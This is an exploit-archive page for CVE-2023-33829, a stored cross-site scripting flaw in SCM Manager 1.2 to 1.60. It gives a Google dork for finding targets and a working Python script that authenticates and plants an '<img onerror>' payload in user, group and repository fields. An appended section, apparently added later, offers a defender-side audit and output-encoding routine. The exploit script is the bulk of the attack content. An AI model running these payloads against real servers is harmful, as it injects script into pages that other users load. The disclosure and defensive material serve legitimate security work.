Headline
SCM Manager 1.60 Cross Site Scripting
SCM Manager versions 1.2 through 1.60 suffer from a persistent cross site scripting vulnerability.
#!/usr/bin/python3
# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)
# Google Dork: intitle:"SCM Manager" intext:1.60
# Date: 05-25-2023
# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)
# Vendor Homepage: https://scm-manager.org/
# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/
# Version: 1.2 <= 1.60
# Tested on: Debian based
# CVE: CVE-2023-33829

# Modules
import requests
import argparse
import sys

# Main menu
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", required=True, help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", required=True, help="password of the user")
args = parser.parse_args()

# Credentials (taken from the parsed arguments, so option order does not matter)
user = args.user
password = args.password

# Global Variables
main_url = "http://localhost:8080/scm"  # Change URL if necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"

# Create a session
session = requests.Session()

# Credentials to send
post_data = {
    'username': user,      # change if you have any other user with write permissions
    'password': password   # change if you have any other user with write permissions
}

r = session.post(auth_url, data=post_data)

if r.status_code == 200:
    print("[+] Authentication successfully")
else:
    print("[-] Failed to authenticate")
    sys.exit(1)

# User whose displayName carries the markup
new_user = {
    "name": "newUser",
    "displayName": "<img src=x onerror=alert('XSS')>",
    "mail": "",
    "password": "",
    "admin": False,
    "active": True,
    "type": "xml"
}

create_user = session.post(users, json=new_user)
print("[+] User with XSS Payload created")

# Group whose description carries the markup
new_group = {
    "name": "newGroup",
    "description": "<img src=x onerror=alert('XSS')>",
    "type": "xml"
}

create_group = session.post(groups, json=new_group)
print("[+] Group with XSS Payload created")

# Repository whose description carries the markup
new_repo = {
    "name": "newRepo",
    "type": "svn",
    "contact": "",
    "description": "<img src=x onerror=alert('XSS')>",
    "public": False
}

create_repo = session.post(repos, json=new_repo)
print("[+] Repository with XSS Payload created")
Related news
CVE-2023-33829
A stored cross-site scripting (XSS) vulnerability in Cloudogu GmbH SCM Manager v1.2 to v1.60 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description text field.
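
Added example, not part of the original advisory or the PoC author's code: a defender-side audit for the fields the PoC targets (`displayName` on users, `description` on groups and repositories), paired with the output encoding that neutralises a stored value at render time. The record shape is assumed from the PoC's request bodies, and the sample records are constructed.

```python
import html
import re

# Plain-text fields the PoC fills with markup, keyed by REST collection.
TEXT_FIELDS = {
    "users": ("displayName",),
    "groups": ("description",),
    "repositories": ("description",),
}

# "<" followed by a letter, "/", "!" or "?" is what an HTML parser treats as markup.
TAG_OPENER = re.compile(r"<[a-zA-Z/!?]")


def audit(kind, records):
    """Return (name, field, value) for each plain-text field that contains markup."""
    findings = []
    for rec in records:
        for field in TEXT_FIELDS[kind]:
            value = rec.get(field) or ""
            if TAG_OPENER.search(value):
                findings.append((rec.get("name"), field, value))
    return findings


def render_safe(value):
    """Encode a stored value for an HTML text or quoted-attribute context."""
    return html.escape(value or "", quote=True)


# Constructed sample records (not real server output).
SAMPLE = {
    "users": [
        {"name": "alice", "displayName": "Alice O'Neil"},
        {"name": "newUser", "displayName": "<img src=x onerror=alert('XSS')>"},
    ],
    "groups": [{"name": "newGroup", "description": "<img src=x onerror=alert('XSS')>"}],
    "repositories": [{"name": "builds", "description": "R&D artifacts < 2 GB"}],
}

if __name__ == "__main__":
    for kind, records in SAMPLE.items():
        for name, field, value in audit(kind, records):
            print(f"{kind}/{name}: {field} contains markup -> {render_safe(value)}")
```

The audit only flags existing records for review; the durable fix is encoding at render time, which is why `render_safe` is applied to every value regardless of whether the audit matched.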